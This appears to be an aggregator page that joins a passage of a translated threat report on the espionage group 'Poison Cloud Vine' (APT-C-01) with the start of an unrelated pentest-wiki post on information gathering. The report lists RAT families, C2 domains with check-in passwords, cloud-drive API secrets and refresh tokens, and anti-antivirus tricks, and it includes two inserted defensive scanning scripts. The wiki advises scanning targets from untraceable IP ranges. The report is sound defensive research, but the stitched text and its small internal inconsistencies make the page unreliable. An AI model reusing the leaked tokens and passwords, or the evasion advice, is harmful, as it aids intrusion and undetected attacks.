Version B	16 October 2014 (sample capture)	Xecure Lab [6]	Uses an INF to run the PE trojan embedded in the “.ppsx” document
Version C	12 September 2014 (sample capture)	360	No INF; runs the PE trojan embedded in the “.ppsx” document directly

3)     CVE-2017-8759

A. Background

CVE-2017-8759 is a 0day disclosed by FireEye on 12 September 2017. Microsoft published its security bulletin the same day.

CVE ID	CVE-2017-8759
Description	CVE-2017-8759 is a code injection vulnerability in the SOAP WSDL parser: while parsing content defined by a SOAP WSDL, it allows an attacker to inject arbitrary code, affecting all .NET environments.
Published	12 September 2017
References	https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8759

B. In this campaign

MD5	File name	Malware name
5d0b4cadfb149695d9fbc71dd1b36bef	2017䞀岞关系新进展䞎问题(内郚).rtf (New developments and issues in cross-strait relations, 2017 (internal))	virus.exp.20178759

The RTF document uses the objautlink and objupdate control words to update the linked object automatically; once the exploit triggers, mshta.exe executes an HTA file fetched from a remote address.

The HTA file is an HTML page with embedded malicious VBS, which invokes PowerShell to download the subsequent exe loader.

3.      Continued penetration

1)     RAT evolution

A RAT (Remote Access Trojan), commonly called a remote control trojan.

Figure 26: RAT evolution timeline

RAT	Earliest	Latest
ZxShell	2007/12/26	2014/10/14
Poison Ivy	2011/12/27	2014/9/10
kbox	2015/2/11	2015/5/4
puppet	2008/12/22	2009/2/12
httpbot	2013/7/23	2013/10/2
gh0st	2009/1/13	2013/4/21
AresRemote	2009/5/5	2009/5/5
shellcode	2011/7/13	2015/5/5
XRAT	2013/11/6	2013/11/6
FakeRising	2009/5/15	2009/5/15
FakeWinupdate	2009/10/21	2009/10/21
SBlog2014		
SBlog2015		

The backdoors involve 11 versions in total. Their proportions are:

Figure 27: Distribution of the 11 RAT versions

RAT	Count
ZxShell	23
Poison Ivy	17
kbox	15
puppet	4
httpbot	4
gh0st	4
FakeRising	2
AresRemote	1
shellcode	1
XRAT	1
FakeWinupdate	1

2)     Analysis of the 13 RAT versions

Figure 28: RAT version classification

A.       Poison Ivy

Poison Ivy is essentially a remote control trojan (RAT). FireEye has published a dedicated analysis of it [7].

The Poison Ivy trojans in this report were all produced by builder version 2.3.2 (the builder has gone through 10 versions starting from 1.0.0, the latest being 2.3.2). The builder can produce both an EXE and a shellcode form; in this campaign all trojans were in shellcode form. Furthermore, the mutex was almost always the default “)!VoqA.I4”.

Figure 29: Poison Ivy builder configuration screen

Figure 30: Relationship between the outer and inner PI

In addition, every Poison Ivy trojan is obtained from the outer dropper by XORing successively with key1 and key2 to yield the shellcode.

Figure 31: Comparison of three Poison Ivy XOR decryption routines

The table below lists the Poison Ivy configuration IDs and passwords.

MD5	ID	Password
d61c583eba31f2670ae688af070c87fc	14	926
26d7f7aa3135e99581119f40986a8ac3	14	8613
5ee2958b130f9cda8f5f3fc1dc5249cf	4	#My43@92
7639ed0f0c0f5ac48ec9a548a82e2f50	1013	@1234@
250c9ec3e77d1c6d999ce782c69fc21b	avex	admin
f3ed0632cadd2d6beffb9d33db4188ed	w6U900	admin
9b925250786571058dae5a7cbea71d28	zhan	ftp1234
ae004a5d4f1829594d830956c55d6ae4	zhan2	ftp1234
fccb13c00df25d074a78f1eeeb04a0e7	zhan2	ftp1234
a73d3f749e42e2b614f89c4b3ce97fe1	009-4	ftp443
785b24a55dd41c94060efe8b39dc6d4c	120707	hook32wins
36c23c569205d6586984a2f6f8c3a39e	90518	kkbox55
81e1332d15b29e8a19d0e97459d0a1de	90518	kkbox55
7c498b7ad4c12c38b1f4eb12044a9def	motices	ps135790
ca663597299b1cecaf57c14c6579b23b	010-4	ps1478
76782ecf9684595dbf86e5e37ba95cc8	13099	updatewin
c31549489bf0478ab4c367c563916ada	0314–Good	updatewin
B.       ZxShell

ZxShell was used continuously by Poison Cloud Vine from December 2007 to October 2014. Because the versions differ considerably, we distinguish an internal release from a source-code release: the first refers to the ZxShell trojans the group used from 2007 until before 2012, the second to those used from 2012 to 2014, which were developed from the published source code; we call these the re-developed version.

Both the internal release and the source-code release are version 3.0; the former was not widely released and is richer in functionality, while the latter's source spread widely and had some features removed.

For research on ZxShell, see Cisco's Threat Spotlight: Group 72, Opening the ZxShell report [8].

Command	Internal release	Source-code release	Re-developed version
CleanEvent	√	√	√
End	√	√	√
Execute	√	√	√
Help / ?	√	√	√
LoadDll	√	√	√
Ps	√	√	√
SC	√	√	√
ShareShell	√	√	√
SysInfo	√	√	√
TermSvc	√	√	√
TransFile	√	√	√
ZXNC	√	√	√
zxplug	√	√	√
CA	√	√	×
CloseFW	√	√	×
FileTime	√	√	×
PortScan	√	√	×
RunAs	√	√	×
Shutdown	√	√	×
Uninstall	√	√	×
User	√	√	×
ZXHttpProxy	√	√	×
ZXHttpServer	√	√	×
ZXSockProxy	√	√	×
capsrv	√	×	×
Exit / Quit	√	×	×
FileMG	√	×	×
FindDialPass	√	×	×
FindPass	√	×	×
GetCMD	√	×	×
KeyLog	√	×	×
rPortMap	√	×	×
SYNFlood	√	×	×
winvnc	√	×	×
ZXARPS	√	×	×
Total commands	35	24	13

The table shows the number of built-in commands declining across versions: Poison Cloud Vine removed many existing functions, kept only 13 commands in the re-developed version, and then added other commands and features. The features added in the re-developed version are listed below:

Re-developed version compared with the source-code release

Removed functions:
  • Clone a system account
  • Temporarily disable the built-in Windows firewall
  • Clone a file's timestamps
  • Port scan
  • Run a program as another process or user
  • Log off / reboot / shut down the system
  • Uninstall
  • System account management
  • Proxy server
  • HTTP server
  • Socks 4 & 5 proxy

Retained functions:
  • Clear the system logs
  • End this program
  • Run a program
  • Show this help
  • Load a DLL or inject it into a specified process
  • Process management
  • Service management
  • Share a shell with someone else
  • View detailed system information
  • Configure terminal services
  • Download a file from a URL or upload a file to a specified FTP server
  • NC
  • Plugin function, custom commands can be added

Added functions:
  • IEPass (obtain IE passwords)
  • Search for sensitive information
  • Encrypted writing to file (within a specified time range, for specified extensions and keywords)
  • Collect information and send it back to the server
  • Later changes: the monitoring log file is encrypted and written into adovbs.mof; monitoring of configured strings is added; Profiles.log is added to record system and file information

The samples we captured are modified from the ZxShell source and keep its original structure; ZxShell itself has twenty-odd commands. Apart from the commands retained, our samples removed a large number of them, such as install/launch, clone system account, disable firewall, port scan and proxy server. The “IEPass” command was added.

Figure 32: Code containing the IEPass command

Sub-version iterations (re-developed version)

1.  Compared with the previous version, the main change is in information collection: the creation-time window for collected documents changes from six months ago to four years ago; files with the “.wps” extension are added; the original “.doc” becomes “.doc*”

2.  The creation-time window for stolen documents goes back to six months; the file-packing part is modified; file version information is removed

3.  A larger change: the monitoring log file is encrypted and written into adovbs.mof; monitoring of configured strings is added; Profiles.log is added to record system and file information

4.  Few functional changes from the previous version; the positions of the functions changed, an adjustment made to evade antivirus software.

Figure 33: Code containing the keywords

ZxShell configuration list

Check-in password	Tag	Keywords
admin	fish1111	“201”, “报”, “项”
ps1357	ps1234	“军事”, “对台”, “工䜜”
ftp533	ftp1234	“军”, “项”
8613	spring	“军”, “航”, “报告”
661566	倧661566倧	“极地”, “军”, “雪”
987	zxcvasdf	“对台”, “囜际”, “军”
95279527	asusgo	“航”, “无人”, “军”
qwer1234	kano918	“航”, “军”, “郚”

C.       Kanbox (酷盘) version

The samples are disguised with a folder icon; when run they drop the trojan file “svch0st.exe” together with a normal folder and a “.doc” document used to mislead the user.

“svch0st.exe” is a trojan that communicates over SSL. Every hour it runs its entire routine: it collects all information on the computer (directory listings, system version, network adapter information, process list, packing of specified files, network and disk information), and if files are found whose names contain keywords such as “台”, “军” or “战”, it packs them and uploads them over SSL to a Kanbox account the attacker registered in advance.

The C&C address is a Kanbox address [9]; files are uploaded through the API Kanbox provides.

Figure 34: Code containing the Kanbox API address

Figure 35: Kanbox website homepage

Kanbox version A (does not drop a shellcode backdoor):
1.  Drop the information-stealing trojan sub-body
2.  Collect system information
3.  Search for sensitive files
4.  Pack, encrypt and upload the sensitive files

Kanbox version B (drops a shellcode backdoor):
1.  Drop the information-stealing trojan sub-body
2.  Collect system information
3.  Search for sensitive files
4.  Pack, encrypt and upload the sensitive files
5.  Drop the shellcode backdoor sub-body (added)
6.  Connect to the remote C&C server (added)
7.  Execute remote commands (added)

Kanbox version configuration list

Sample compile timestamp	Monitored strings	Marker
2/11/2015  20:48:26	“2014”, “军”, “兵”	A-plus
2/11/2015  20:48:26	“台”, “军”, “战”	Aboutdoublewu
2/11/2015  20:48:26	“201”, “报”, “研”	book
2/11/2015  20:48:26	“囜际”, “合䜜”, “军事”	wind
2/11/2015  20:48:26	“郚队”, “机场”, “郚队”	rankco
3/1/2015  22:08:18	“2014”, “军”, “兵”	A-plus
3/2/2015  8:21:01	“军”, “机”, “站”	ineedyou
3/2/2015  23:17:57	“十”, “囜”, “䞭”	ineedyou
3/2/2015  23:17:57	“军”, “机”, “站”	ineedyou
3/2/2015  23:17:57	“十䞉”, “运蟓”, “铁路”	AJ
5/4/2015  16:48:12	“郚队”, “台湟”, “基地”	rancor
5/4/2015  16:48:12	“军”, “科技”, “囜”	furyman
5/4/2015  16:48:12	“201”, “密”, “内郚”	king
5/4/2015  16:48:12	“2015幎”, “工䜜”, “报告”	comein
5/4/2015  16:48:12	“201”, “报”, “研”	book

D.       Unknown RATs

The unknown RATs are divided by their outer dropper into a folder version and a bundled version; the RATs inside come in 4 versions, all of them unknown remote-control trojans.

  a)        Folder version

Figure 36: Changes after the unknown RAT (folder version) executes

  b)       Bundled version

Figure 37: Digital signature used by the unknown RAT

E.       Others

The backdoors used by Poison Cloud Vine in its campaigns further include three RATs: gh0st, XRAT and HttpBot.

3)     Analysis of the script-loaded attack payload

In early 2018, 360 Threat Intelligence Center found a control domain used by Poison Cloud Vine to control and distribute attack payloads, http://updateinfo.servegame.org, and disclosed the attack technique and correlation analysis (see https://ti.360.net/blog/articles/analysis-of-apt-c-01/).

In that campaign the group used a CVE-2017-8759 exploit document to download a malicious HTA file, which executed script commands to download and run the subsequent payload modules.

A. Dropper analysis

The dropper is downloaded and executed by the exploit document attached to the spear-phishing email.

It then downloads a malicious HTA file, which runs a PowerShell command to download the loader, saves it as officeupdate.exe and executes it.

B. Loader analysis

Based on strings in the loader, its author named it SCLoaderByWeb, version 1.0, literally a shellcode loader that fetches from the web. It downloads and executes shellcode.

The loader first tries to connect to a common website to check network connectivity; if there is none it retries every 5 seconds until it succeeds.

It then downloads the payload from hxxp://updateinfo.servegame.org/tiny1detvghrt.tmp:

Next it checks whether the download succeeded; if not, it sleeps for 1 second and tries to download the payload again:

After a successful download, each byte of the file is XORed in turn with 0xac, 0x5c and 0xdd to decrypt it (which amounts to XORing each byte with 0x2d):

The decrypted shellcode is then executed in a newly created thread:

C. Shellcode analysis

The .tmp files hosted on the distribution domain are all byte-wise XORed shellcode. The figure below shows the tinyq1detvghrt.tmp file downloaded from the distribution domain, which is data XOR-encrypted with 0x2d.
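A small triage routine for these .tmp payloads, written here as an added example (not the loader's or 360's code): it applies the same three-key XOR chain the page describes, shows that it collapses to a single XOR with 0x2d, and then looks for the default Poison Ivy mutex string named earlier in the report. The encoded sample is constructed inline, not a real capture.

```python
"""Decode a SCLoaderByWeb-style .tmp payload and triage the result."""
from functools import reduce
import string

XOR_CHAIN = (0xAC, 0x5C, 0xDD)   # keys the loader applies one after another (from the report)
PI_MUTEX = b")!VoqA.I4"           # default Poison Ivy mutex named in the report


def chain_key(chain=XOR_CHAIN) -> int:
    """Successive XORs with fixed keys equal one XOR with their combination."""
    return reduce(lambda a, b: a ^ b, chain, 0)   # 0xac ^ 0x5c ^ 0xdd == 0x2d


def decode_payload(data: bytes, chain=XOR_CHAIN) -> bytes:
    """Undo the per-byte XOR chain to recover the shellcode."""
    key = chain_key(chain)
    return bytes(b ^ key for b in data)


def printable_strings(blob: bytes, min_len: int = 6):
    """Extract ASCII runs, like the `strings` tool, for a quick look at the decoded blob."""
    out, cur = [], bytearray()
    for b in blob:
        if chr(b) in string.printable and b not in (0x0A, 0x0D, 0x0B, 0x0C):
            cur.append(b)
        else:
            if len(cur) >= min_len:
                out.append(cur.decode("ascii"))
            cur = bytearray()
    if len(cur) >= min_len:
        out.append(cur.decode("ascii"))
    return out


def triage(data: bytes) -> dict:
    """Decode and report whether the Poison Ivy mutex marker is present and which strings surface."""
    plain = decode_payload(data)
    return {
        "key": chain_key(),
        "has_pi_mutex": PI_MUTEX in plain,
        "strings": printable_strings(plain),
    }


# Constructed stand-in for a downloaded .tmp file: a few fake code bytes, then a
# config area carrying the mutex and a check-in host, encoded the way the loader expects.
_FAKE_PLAIN = (b"\x90\x90\xe8\x00\x00\x00\x00" + PI_MUTEX + b"\x00"
               + b"c2.example.invalid" + b"\x00\x30\x30\x30")
SAMPLE_TMP = bytes(b ^ 0x2D for b in _FAKE_PLAIN)

if __name__ == "__main__":
    print(triage(SAMPLE_TMP))
```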

After decryption it turns out to be shellcode generated by Poison Ivy; the marker is shown below:

By comparing the shellcode format produced by the Poison Ivy builder with the shellcode used in this payload, we worked out the position and meaning of each configuration field in the shellcode.

The shellcode configuration field format in detail:

When analysing the Poison Ivy code that obtains the kernel32 base address, we found it is incompatible with Windows 7: on Windows 7 the second module in InitializationOrderModule is KernelBase.dll, so what it actually obtains is the base address of KernelBase.

Since Poison Ivy is no longer updated, the attackers patched the code that obtains the kernel32 base so that the shellcode also runs on later Windows versions.

The improvement works as follows:

  1. A jump is inserted before the original kernel32-base code, to the tail of the shellcode, where the patch code is appended
  2. The patch code first obtains the base address of the second module in InitializationOrderModule (kernel32.dll on Windows XP, kernelbase.dll on Windows 7)
  3. It then obtains the address of LoadLibraryExA in that second module (both kernel32.dll on XP and kernelbase.dll on Windows 7 export this function)
  4. Finally it calls LoadLibraryExA to obtain the base address of kernel32.

The attackers' patch makes the shellcode work across different Windows versions.

The shellcode's main function is the RAT's control module: it communicates with the C2 and implements remote control. Here we simulated the trojan's check-in on a Windows 7 system.

Decrypting the other shellcode files hosted on the control domain gives the following check-in statistics:

Campaign ID	Check-in domain	Port	Check-in password	Mutex
2017	office.go.dyndns.org	5566	!@#3432!@#@!	)!VoqA.I4
bing	zxcv201789.dynssl.com	8088	zxc5566	)!VoqA.I4
ding1	microsoftword.serveuser.com	53	1wd3wa$RFGHY^%$	)!VoqA.I4
ding2	uswebmail163.sendsmtp.com	53	1wd3wa$RFGHY^%$	)!VoqA.I4
geiwoaaa	geiwoaaa.qpoe.com	443	wyaaa8	)!VoqA.I4
jin_1	hy-zhqopin.mynumber.org	80	HK#mq6!Z+.	)!VoqA.I4
jin_2	bearingonly.rebatesrule.net	53	~@FA<9p2c*	)!VoqA.I4
justdied	www.service.justdied.com	80	ppt.168@	)!VoqA.I4
pouhui	pouhui.diskstation.org	53	index#help	)!VoqA.I4
tina_1	fevupdate.ocry.com	80	168168	)!VoqA.I4
tina_2	wmiaprp.ezua.com	53	116688	)!VoqA.I4
tony_1	winsysupdate.dynamic-dns.net	80	0A@2q60#21	)!VoqA.I4
tony_2	officepatch.dnset.com	53	aZ!@2q6U0#	)!VoqA.I4
4)     Analysis of the latest control trojan

In May 2018, in the group's attacks on domestic maritime organizations and units, we found a new trojan it uses. It is delivered mainly as a RAR self-extracting attachment to spear-phishing emails and runs when the targeted person double-clicks it.

At the RAT module's entry point, an exception is triggered deliberately and the malicious code runs inside the catch block:

It then uses the same method, triggering an exception, to enter the second layer of code:

It reaches the code that initializes a socket and connects to the C2:

It connects to port 8080 of zxcv201789.dynssl.com to create the C&C channel:

The check-in packet sent to the control server contains the check-in password asd88:

Finally it enters the RAT's command loop:

As shown below:

The functions include:

Token	Function
0x04	Close the connection
0x41	Remote shell
0x42	Enumerate processes
0x43	Kill a specified process
0x51	Enumerate drives
0x52	List a specified directory
0x53	Upload a file to the victim
0x54	Download a file from the victim
0x55	Delete a file
0x56	Remote execution

All strings in this trojan are stored reversed and restored at run time with the C function strrev; the same technique appeared in the group's 2015 trojans. As shown below:

4.      C&C analysis

1)     Dynamic DNS

Figure 38: Dynamic DNS provider ChangeIP

Figure 39: Proportions of dynamic DNS providers

Dynamic DNS provider	Number of domains
ChangeIP	30
No-IP	9
DynDNS	2
AfraidFreeDNS	1
dnsExit	1
Non-dynamic domains	6

2)     Meaning of the domain names

Below is an analysis of the meanings of the subdomain names the group registered with dynamic DNS providers, mapped to the sites they imitate.

C&C	Name	Website	Website address
chinamil.lflink.com	chinamil	China Military Online	www.chinamil.com.cn [10]
		Red Strategy Net	www.chinamil.com
		China National Defense domain registration site	www.chinamil.cn
soagov.sytes.net, soagov.zapto.org, soasoa.sytes.net	soagov, soasoa	State Oceanic Administration	www.soa.gov.cn
xinhua.redirectme.net	xinhua	Xinhuanet	www.xinhuanet.com

Category	Names
Mail-like	126mailserver, mail.sends, mail163, mailsends
Antivirus-like	kav2011, safe360, cluster.safe360, rising
Network-like	javainfo, webupdate, updates, netlink
Personal names	Sandy, jerry, jason
3)     Cloud drives

The Kanbox samples currently carry two tokens:

	client_id	client_secret	refresh_token
Token1	3edfe684ded31a7cca6378c0226f5629	bfa89eebf29032076e9cffb75549fee5	75cdc35b1cdaee24047f3afb23a5ccce
Token2	7a5691b81bf4322fd88f5fa99407fbbc	d44cfa7dd3c852b69c59efacf766cc23	14b6685330bf32a22688910e765b5dce

By analysing the Kanbox API we obtained information on the cloud-drive account the group uses; it mainly consists of a China Mobile phone number, which was used to register the account.

Below are some correlation results obtained from that phone number:

Figure 40: Google search results

Figure 41: User information on the Weifengtang motorcycle site (1)

Figure 42: User information on the Weifengtang motorcycle site (2)

Figure 43: Alipay and WeChat information for the phone number's owner

4)     Third-party blog

Figure 44: Partial screenshot of a third-party blog

The figure above shows Poison Cloud Vine using a third-party blog to distribute malicious code. Blog domains are usually on the whitelists of firewalls and security software, so storing malicious code on a blog evades detection and blocking.

5)     C&C IPs (ASN)

Figure 45: C&C IP correlation analysis

6)     Others

Among the non-dynamic domains, gaewaaa.upgrinfo.com has whois information, shown below.

Figure 46: Domain registration information

Another non-dynamic domain: moneyaaa.beijingdasihei.com

5.      Correlation analysis

1)     Overall correlation

Correlation across different resources: the original attack emails, exploit documents, 3 different RATs (ZxShell, Poison Ivy and the Kanbox version), plus related domains, check-in passwords, file extensions, archive passwords and keywords.

Figure 47: Overall correlation across resources

2)     RAT iteration and evasion techniques

RAT	A: Development environment	B: Encryption method	C: Custom stealing function	D: Shellcode	E: AV evasion (static)	F: AV evasion (dynamic)	G: Disguised documents etc.
httpbot	C++	×	√	×	√	√	√
Kbox	C++	√	√	√	√	√	√
Poison Ivy	C++	√	×	√	√	√	×
puppet	Borland C++	√	×	×	√	×	√
XRAT	Delphi	√	×	√	√	√	×
gh0st	Borland C++	√	×	×	√	×	√
FakeRising	Borland C++	×	×	×	×	×	×
AresRemote	C++	√	×	×	√	×	√
shellcode	C++	√	×	√	√	√	
FakeWinupdate	C++	√	×	×	√	×	×
SBolg2014	C++	√	√	√	√	×	√
SBolg2015	C++	√	×	√	√	×	×
zxshell	C++	√	√	√	√	√	

Typical techniques of the homologous samples

A.       Development environment

Except for the XRAT backdoor, all versions from 2007 to 2015 were developed in C++.

B.       Encryption method

The 2011, memcache, Voice64, HTTPBOTS, kanbox, PI and XRAT versions all decrypt with two consecutive XORs and then execute the malicious code. The cloud-drive trojan also applies a similar encryption to files before uploading them.

Figure 48: Unknown RAT 2011 (left), Kanbox version (right)

C.       Stealing function

The custom stealing function in the ZxShell backdoor is very similar to the one in the 2015 cloud-drive sub-body. Both exclude drive A from the search (usually the floppy drive letter), and both enumerate the drives in advance, keep the drive-letter list in memory, and read it through a pointer plus 5.

Figure 49: ZxShell (left), Kanbox version (right)

D.       Shellcode backdoor

Comparing the shellcode that the 2011 Poison Ivy injected into the system with the 2015 cloud-drive sub-body shows highly similar shellcode backdoors; in both, the check-in address is padded with 0x30 at the end.

Figure 50: Unknown RAT 2011 (left), Kanbox version (right)

Detection result for the shellcode trojan file: 0 detections

https://www.virustotal.com/en/file/8cee670d7419d1fd0f8f0ac6a2bd981593c2c96ca0f6b8019317cf556337cfa8/analysis/

E.       Sub-body file name (outer layer)

Comparing the 2009 and 2011 code shows that the dropped sub-body file name is ~work.tmp in both, the format string is “%s\%s.bak” in both, and the code is extremely similar.

~tmp.tmp, ~tmp.zip and ~mstmp.cpt were used as temporary trojan file names (2007–2009).

Figure 51: Unknown RAT 2009 (left), unknown RAT 2011 (right)

F.       AV evasion: reversed API strings (against static scanning)

The HttpBot, Kanbox, XRAT and unknown RAT (2007–2011) trojans were written with reversed API strings. At run time the trojan turns the reversed string back into the normal API name with _strrev and then obtains the API address dynamically with GetProcAddress. Reversed API strings make string-based detection harder, so the API names are not easily detected; on top of that, because the API addresses are resolved while the trojan runs, they are hard to find in the static PE information, which makes API detection harder as well.

Poison Cloud Vine is known to have used this method since at least 2009 and was still using it in 2018.

Figure 52: Unknown RAT 2009 (top), Kanbox (bottom)
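The reversed-string trick (used here and in the 2018 trojan that calls strrev on every string) is simple to hunt for once you know to look: reverse every printable run in a file and match it against API names a loader normally resolves through GetProcAddress. The scanner below is an added example, not code from 360 or the group; the binary blob it scans is constructed, not a real sample.

```python
"""Flag files that store Win32 API names reversed (the anti-static-scan trick described above)."""
import re

# Names a loader typically resolves at run time; a stored "AxEyrarbiLdaoL" is a giveaway.
WATCHED_APIS = [
    "LoadLibraryExA", "LoadLibraryA", "GetProcAddress", "VirtualAlloc",
    "CreateThread", "WinExec", "GetClientRect", "InternetOpenUrlA",
    "URLDownloadToFileA", "CreateMutexA",
]
REVERSED_LOOKUP = {name[::-1]: name for name in WATCHED_APIS}
ASCII_RUN = re.compile(rb"[\x20-\x7e]{4,}")   # printable runs of 4+ bytes, like `strings`


def find_reversed_apis(blob: bytes):
    """Return (offset, stored_string, api_name) for every reversed API name in the blob."""
    hits = []
    for m in ASCII_RUN.finditer(blob):
        run = m.group().decode("ascii")
        # A reversed name may be a whole run or embedded in a longer one.
        for rev, name in REVERSED_LOOKUP.items():
            idx = run.find(rev)
            if idx != -1:
                hits.append((m.start() + idx, rev, name))
    return sorted(hits)


def verdict(blob: bytes, min_hits: int = 2) -> bool:
    """Two or more distinct reversed API names is a strong enough signal to escalate for review."""
    return len({name for _, _, name in find_reversed_apis(blob)}) >= min_hits


# Constructed sample: a benign-looking string table plus reversed API names,
# mimicking what the report's figure shows (the trojan passes these to _strrev at run time).
SAMPLE_BIN = (
    b"MZ\x90\x00" + b"\x00" * 12
    + b"Software\\Microsoft\\Windows\x00"
    + b"AxEyrarbiLdaoL\x00"      # "LoadLibraryExA" reversed
    + b"sserddAcorPteG\x00"      # "GetProcAddress" reversed
    + b"daerhTetaerC\x00"        # "CreateThread" reversed
    + b"kernel32.dll\x00"        # normal forward string
)
# A file that imports the same APIs the ordinary way should not trigger.
CLEAN_BIN = b"MZ\x90\x00" + b"LoadLibraryA\x00GetProcAddress\x00kernel32.dll\x00"

if __name__ == "__main__":
    for off, stored, api in find_reversed_apis(SAMPLE_BIN):
        print(f"0x{off:04x}: {stored!r} -> {api}")
    print("escalate:", verdict(SAMPLE_BIN), "| clean:", verdict(CLEAN_BIN))
```

The same pass is a cheap addition to an attachment sandbox or a YARA-style triage step; pairing it with an import-table check (a PE that imports almost nothing but GetProcAddress) cuts false positives further.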

G.       AV evasion: wrong API parameters (against dynamic scanning)

The Kanbox, Poison Ivy, XRAT, ZxShell and unknown RAT (2007–2011) trojans use the GetClientRect function to defeat the dynamic scanning of antivirus software.

The prototype is BOOL GetClientRect(HWND hWnd, LPRECT lpRect); it retrieves the coordinates of a window's client area; the first parameter is the target window handle, the second receives the coordinate structure. The trojan deliberately passes 0 as the first parameter, so that on a real Windows system GetClientRect always fails and returns 0.

Many antivirus products now use dynamic scanning, mostly for heuristic detection. When emulating GetClientRect they did not account for wrong parameters, so the emulated call always succeeds and returns non-zero. The trojan can therefore tell the antivirus virtual environment apart from a real user system and evade detection. In testing, the trojan was able to detect Kaspersky's virtual-machine heuristic scanning environment.

Poison Cloud Vine is known to have used this method since at least 2011 and was still using it in 2018.

Figure 53: Unknown RAT 2011 (top left), zxshell (top right), Kanbox (bottom)

The Kanbox version calls GetClientRect through a dynamically resolved API address.

H.      Legitimate digital signatures

Early versions, before 2011

2015 BLOG version

Signing began in May 2015; the signature appears to have been stolen.

Signer: We Build Toolbars LLC

Chapter 4  Who is behind it

1.      Resources and methods

1.  Exploit documents

1)      Mainly the dropped normal DOC: Traditional Chinese, or fonts and characters particular to a certain region; the DOC code page

2)      Some paths, e.g. the PPSX's DANK

2.  PE strings: Traditional Chinese, or characters particular to a certain region (BIG5 etc.); PE file version information; check-in ID / password / mutex strings

3.  C&C

1)      Non-dynamic domains: Wade–Giles romanization in the registration information

2)      Dynamic domains

3)      Cloud drives

4.  IPs: a certain region or the United States; C&C IPs and email IPs are mainly distinguished

5.  Working hours (PE timestamps, document timestamps, etc.); conclusions such as attacks concentrating on Monday mornings

2.      Related correlation information

1)     Domain whois information

The registration address of javainfo.upgrinfo.com is in a certain region, and the registrant name may be in Wade–Giles romanization.

2)     Keywords of interest

Figure 54: Code containing the keywords

Keywords:
 “对台”, “台”, “台湟”

List of original file names (decoy file names) of the exploit documents or trojans:

3)     Traditional Chinese fonts and the BIG5 charset in PE samples

The help text in the ZxShell version appears garbled; it is actually Traditional Chinese.

Figure 55: ZxShell code screenshot

Figure 56: Unknown RAT 2009

4)     Traditional Chinese fonts in exploit documents

Figure 57: CVE-2014-4114 exploit document property details

Figure 58: Content of the slide file inside the CVE-2014-4114 exploit document

5)     Dropped decoy documents

Default font of a certain region: PMingLiU (细明䜓)

Figure 59: Decoy document dropped by the backdoor

Figure 60: Related Xinhuanet news screenshot

Chapter 5  Group capability and characteristics

Category	Item	Poison Cloud Vine	OceanLotus
Targets	People	Government staff, industry experts	Government staff, industry experts
	Sectors, fields	Chinese government, research institutes, maritime organizations etc.; military, cross-strait relations	Chinese government, research institutes, maritime organizations etc.
	Countries	China	China, others
	Regions	Focus: Beijing, Fujian, Guangdong, Zhejiang, Shanghai	Focus: Beijing, Tianjin
Profile	Attackers' personal information		
	Scale		
	Native language	Simplified Chinese, Traditional Chinese	Simplified Chinese, Vietnamese
	Threat level	High (5)	High (4)
	Overall capability	High (5)	High (3)
	Operations the group is involved in (group-specific)		
	Groups involved in the operations (operation-specific)		
Techniques	Common language	Simplified Chinese	Simplified Chinese
	Attack vector	Email + PE, email + exploit document	Email + PE, website + PE (Mac)
	Email-sending habit	Web mail, PHPMailer tool	
	0day use	1	None
	Exploits used	CVE-2014-4114, CVE-2012-0158	None
	Platforms	Windows	Windows, Mac
	Lateral movement		
	Common RAT types	PI, ZxShell etc.	Unknown
	Number of families	6 or more	4
Goals	Destruction	None	None
	Theft	C&C commands, enumeration of specified files	C&C commands
Duration	First attack	2007	2012
	Latest attack	2018	2018
	Activity	Very active	Very active
Other	C&C domain attributes	Mostly dynamic domains (No-IP etc.)	No dynamic domains, but whois privacy protection
	IP attributes	ADSL, mostly in a certain region; also the United States and Hong Kong	
Appendix 1: File MD5 list


 

Appendix 2: C&C list


The post Poison Cloud Vine (APT-C-01): Exposing a Military and Political Intelligence Spy appeared first on 🔰雚苁ℒ🔰.


Penetration Testing Wiki, Part 1: Information Gathering (Pentest)


0x01 Preface

A while ago I came across the pentest wiki project on GitHub and wanted to tinker with it, so a few buddies and I translated the wiki together. It is fairly friendly to security people who are just starting out. For reasons of length, here is part 1 first.

Part 1: Information Gathering

├─Information gathering
│  ├─README
│  ├─How to gather whois information
│  └─How to gather DNS information
│  ├─Information gathering on Linux
│  └─Information gathering on Windows

Information gathering

In the information-gathering phase you collect everything you can about the target you are attacking, through channels such as social media networks, Google hacking and footprinting of the target's activity. One of the most important skills a penetration tester can have is understanding the target: how it behaves, how it operates, and ultimately how it can be attacked. The information you gather about your target gives you valuable insight into the kinds of security controls in place.

During information gathering you try to identify the protection mechanisms on the target by slowly starting to probe its systems. For example, an organization often only allows traffic on a certain subset of ports on its externally facing devices, and if you query anything other than the whitelisted ports you will be blocked. It is usually a good idea to test this behaviour by probing first from an expendable IP address that you expect to be blocked or detected. The same applies when you test web applications: after some threshold a web application firewall will block you from making further requests. To stay undetected during these tests you can run your initial scans from IP address ranges that cannot be linked back to you and your team. Organizations with an external presence on the Internet typically experience attacks every day, and your initial probes will most likely be written off as part of the background noise.

Information category	Bookmarks
IP analysis	https://www.iana.org/numbers
	https://www.iana.org/assignments/as-numbers/as-numbers.xml
	https://www.iso.org/obp/ui/#home
	https://www.ultratools.com/tools/toolsHome
	https://www.robtex.com/
	http://www.team-cymru.org/IP-ASN-mapping.html
	http://www.iplocation.net/
	http://thyme.apnic.net/
	http://bgp.he.net/
	https://ipinfo.io
Whois analysis	https://www.iana.org/numbers
	http://www.domaintools.com/
DNS analysis	http://www.alexa.com/
	http://searchdns.netcraft.com/
	http://centralops.net/co/
	http://www.yougetsignal.com/
	http://webhosting.info/whois/
	http://reverseip.domaintools.com/
	http://viewdns.info/reverseip/
Live host identification	https://nmap.org/dist/sigs/?C=M;O=D
	https://zmap.io/
	http://masscan.net/
	http://www.secdev.org/projects/scapy/
IDS/IPS identification	https://www.monkey.org/~dugsong/fragroute/
	http://pytbull.sourceforge.net/
	http://tcpreplay.synfin.net/
Open-source intelligence	https://www.shodan.io/
	https://www.exploit-db.com/google-hacking-database/

How to gather whois information

  • Whois search
  • Querying the whois database

On whois information and how attackers use it: attackers use the information shown in whois records against unsuspecting members, leaders and employees of an organization. This document also covers whois gathering on Windows, but it is aimed at Linux/Unix users more than at Windows users.

Whois search

Put simply, whois is a database used to look up whether a domain name has been registered and the details of the registration, such as the domain owner and the registrar. Whois is used to query domain information, but that same information can help an attacker gather what is needed to break into the network.

Querying the whois database

